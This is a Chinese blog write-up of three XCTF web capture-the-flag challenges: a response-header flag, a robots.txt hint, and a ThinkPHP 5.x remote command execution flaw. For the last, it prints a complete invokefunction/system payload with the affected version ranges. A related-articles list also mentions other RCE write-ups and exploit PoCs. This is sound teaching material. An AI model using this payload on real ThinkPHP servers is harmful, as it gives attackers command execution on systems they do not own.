攻防世界 WEB baby_web+WWW-Robots+php_rce

最新推荐文章于 2023-11-08 22:31:33 发布
最新推荐文章于 2023-11-08 22:31:33 发布
阅读量148 收藏 1
点赞数
分类专栏: 攻防世界 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/119274111
版权

baby_web

入门级题目,根据提示想到index.php,然后发现访问会302重定向

那就抓个包看看,发现flag在response header里

WWW-Robots

就差告诉你答案在robots.txt里面了

直接访问,得到//fl0g.php

直接访问,得到flag

php_rce

这题考的是php 5.0版本的一个远程命令执行漏洞

具体情况可以看这一篇https://blog.csdn.net/qq_40884727/article/details/101452478

当ThinkPHP 5.0系列 < 5.0.23

ThinkPHP 5.1系列 < 5.1.31且没有开启强制路由的情况下

构造形如?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php -r 'system("cat ../../../flag");'

的命令可以远程命令执行

index.php是一级目录,\think\php是默认的控制器名,由他来调用invokefunction(类似于java的invoke机制)

invokefunction反射刀call_uesr_func_array函数,然后调用system函数,最后一个参数所要执行的具体命令

参考视频链接:
https://www.bilibili.com/video/BV1Fg411E7r9?pop_share=1
https://www.bilibili.com/video/BV1n3411r7eL
https://www.bilibili.com/video/BV19g41177UN

显哥无敌
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全 | CTF】攻防世界 php_rce 解题详析
等风来
05-22 5685
PHP RCE 指的是通过远程代码执行漏洞(Remote Code Execution)来攻击 PHP 程序的一种方式。简单来说,由于PHP应用程序没有正确处理外部输入数据(如用户提交的表单、请求参数等),此时通过某些手段向 PHP 应用程序中注入恶意代码,然后通过这些恶意代码实现对受攻击服务器的控制。由上图可知,flag字段储存在flag文件夹下的flag文件中。使用thinkphp 5.1.payload进行尝试,根据提示,使用5.0.20版本的Payload。说明命令执行成功,接着抓取flag即可。
file_put_contents + php-fpm 如何命令执行?
conman网络安全
06-21 580
序 在阅读Laravel debug rce[1]的文章时,感叹文章中的技巧之余,有一句话引起了我的注意。 It is well-known that, if you can send an arbitrary binary packet to the PHP-FPM service, you can execute code on the machine. 众所周知,我不知呀! 本文学习file_put_contents + FTP + php-fpm的命令执行。 原理 参考[2],我们可以得知,PHP-
[SWPUCTF 2021 新生赛]babyrce
qq_62046696的博客
05-10 2306
打开界面看见if选项admin=1果断想到用burp抓包然后cookie给admin=1,获取下一步指令 然后url访问, <?php error_reporting(0); highlight_file(__FILE__); error_reporting(0); if(isset($_GET['url'])){ $ip=$_GET['url']; if(preg_match("//",$ip)){ die('nonono'); } $a=shel...
[SWPUCTF 2021 新生赛]babyrce(详解)
A_B_c_d_E_fsad的博客
04-04 2052
最近遇到的事太霉了,又是做到一半,靶机拒绝连接我,搞得我做题都不自信了回到正文题目如下(示例):phpelseecho "小饼干最好吃啦!?>小饼干最好吃啦!看了一下,就是cookie值admin等于1时,就能包含文件,行吧,那就等于吧第一次尝试,用了HackBar直接cookie,嘶?坏了?不确定,就用BurpSuite再试一下(如果成功了,那就跳过这部分,当我没说)第二次,可以是我响应太多没响应到,常规的都不行,那就只能用最原始的办法了。
NewStarCTF 公开赛 第四周 学习记录
m0_64815693的博客
10-16 2189
NewStarCTF 公开赛赛道 web wp
Web】远程命令执行相关例题wp
最新发布
uuzeray的博客
11-08 272
(这里注意:shell_exec是无回显的,一般单独出现会涉及到dnslog外带,但这里后续echo $a实现了回显,属实良心了)3.127.0.0.1|cat /flag 查看根目录下的flag,直接爆出flag。flag每个字母都被过滤了,bash也被拿下,但好在sh还在,可以base64绕过!注释第二行直接告诉了flag的路径,暗示挺明显了,直接curl外带。发现过滤空格,${IFS}或$IFS$9绕过。
HDCTF-2nd复盘
蚁景网安学院
10-28 2316
亲爱的,关注我吧10/28文章共计3358个词文章图片有点多建议在wifi网络下查看来和我一起阅读吧HDCTF_2nd, 海南大学校内赛。国庆打的,之前没时间复现。校外人水了个纪念品。感...
攻防世界】十四 --- Web_python_template_injection --- SSTI
qq_43168364的博客
12-27 433
题目 — Web_python_template_injection 考点:SSTI(服务器模板注入) 一、知识点 1. 何为模板注入 模板引擎可以让(网站)程序实现 界面 与 数据 分离,业务代码 与 逻辑代码 的分离,这大大提升了开发效率,良好的设计也使得代码重用变得更加容易。 但是模板引擎也拓宽了我们的攻击面。注入到模板中的代码可能会引发 RCE 或者 XSS 2. flask基础 (1)路由 from flask import flask @app.route('/index/'
SMBGhost_RCE_PoC-master.zip
06-11
标题中的"SMBGhost_RCE_PoC-master.zip"是一个压缩包文件,其中包含了与名为"SMBGhost"的安全漏洞相关的远程代码执行(RCE)的概念验证(PoC)代码。这个漏洞被称为CVE-2020-0796,它是在服务器消息块版本3(SMBv3)...
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972:VMware vCenter未授权RCE(CVE-2021-21972)
03-04
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972 zoomeye dork:app:“ VMware vCenter” 使用pocsuite3编写的无害检测 ,使用近一年的数据进行探测: 成功率大约:1551/3998 = 39%
攻防世界-Web萌新-csaw-ctf-2016-quals-mfw(.git泄露、php语句闭合)
Sea_Sand息禅
04-15 4458
打开网页,日常扫描,发现git泄露: git工具下载相关文件(git工具自行百度): 然而flag.php的内容是这样的没什么用,想着也不会这么简单: 网页源码有这一段: 说明flag应该就在flag.php中,再看看index.php,主要是这一部分: <?php if (isset($_GET['page'])) { $page = $_GET['page']; ...
攻防世界-web-ics-06--XCTF 4th-CyberEarth
Sea_Sand息禅
04-23 6319
进入index.php,发现可以传参,bp爆破,当id=2333时拿到flag
攻防世界Web_php_unserialize
姜小孩的博客
04-14 2994
反序列化 绕过__wakeup魔术方法 __wakeup魔术方法 Web_php_unserialize 攻防世界
记录第一次ctf比赛
姜小孩的博客
10-11 1260
第一关是在根据题目提示是在F12里一开始漫无目的的寻找,回头再看看题的时候发现他有提示:看到这都还没找到,有点蠢……然后便往回找,最终找到,第一道题看来是给出的礼物hhhhhhhh 第二关是题目提示是菜刀,但是习惯用蚁剑的我便开始了我的蚁剑之旅,点开环境大大的写着密码是wllm,我非常不好意思的直接连接,找到了flag第二关结束 第三关的题目提示是基操,给我看的蒙蒙的,点开环境仔细读代码原来是让post传id=wllm然后get传json其中json需要用json格式,代码如下: <?php h
[SWPUCTF 2021 新生赛]第二波放题
weixin_63231007的博客
04-10 3811
[SWPUCTF 2021 新生赛]easyupload2.0 文件上传,抓包试一下 发现php不行。 和1.0一样,只不过不支持php,用phtml就行了 蚁剑连接,在目录中找到flag。 知识点: 通常,在嵌入了php脚本的html中,使用 phtml作为后缀名; 完全是php写的,则使用php作为后缀名。 这两种文件,web服务器都会用php解释器进行解析。 [SWPUCTF 2021 新生赛]babyrce hackbar传入一个cookie:admin=1后,看见ra.
攻防世界 php_rce 解题思路
xj28555的博客
07-06 1680
进入页面 发现是一个ThinkPHP的框架而且正好是v5.0版本。这个版本存在远程命令执行的漏洞,程序未对控制器进行过滤,导致攻击者可以通过\符号调用任意类。具体漏洞原理分析挂上链接https://www.cnblogs.com/backlion/p/10106676.html 这只使用payload/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&am..
攻防世界进阶部分web题(baby_web,Training-WWW-Robots,php_rce,Warmup)
qq_51283187的博客
11-29 523
一、baby_web 点开题目链接得到 题目描述:想想初始页面是哪个 因为初始页面是index.php 所以想到将http://220.249.52.133:50436/1.php改成http://220.249.52.133:50436/index.php 但是改完之后访问不了所以用Brupsuite抓包试试看 将1.php改成index.php 点击发送,得到新的数据 flag is hidden! 在头部找到flag 二、Training-WWW-Robots 点击链接后得进入这个页面 关于r
攻防世界 WEB Web_python_block_chain
qq_41696858的博客
09-15 6195
这题是区块链题,对区块链不是很了解,想了解原理的建议看这一篇 https://blog.csdn.net/hxhxhxhxx/article/details/108111692 简单介绍一下双花攻击的原理吧,就是区块链是去中心化账本,而且默认长度最长的是主链 如果用户自持有的账本长度大于中心化中心的账本,那么所有的节点都会以当前用户的账本覆盖当前持有的账本,这边是0确认, 就是整个链里就你一个人,所以没有人跟你竞争,所以一定会成功。具体的也不清楚,直接看大佬的脚本吧 具体要改的就是url的三个参数和三个ad
攻防世界 WEB easy_laravel
qq_41696858的博客
02-06 3540
这题我一开始是在攻防世界做的,但是不知道今天靶场又抽什么风了。。。。反正两个靶场配置有点不一样,但是出入不是很大,BUUCTF需要提前手动利用管理员邮箱reset_password一下,攻防世界不需要 打开场景,审计页面源码,发现源码地址直接给出来了,非常的简单粗暴啊 https://github.com/qazxcv123/easy_laravel 建议把源码下下来,自己搭个环境慢慢看,不然不方便。那就看源码呗,先看路由,mvc的入口点 哦对了先说一下,larvel是一个PHPweb框架 在一个个尝试路
攻防世界php_rce
08-26
- *1* *2* *3* [攻防世界-web篇(php_rce)详解](https://blog.csdn.net/qq_54803507/article/details/127041653)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值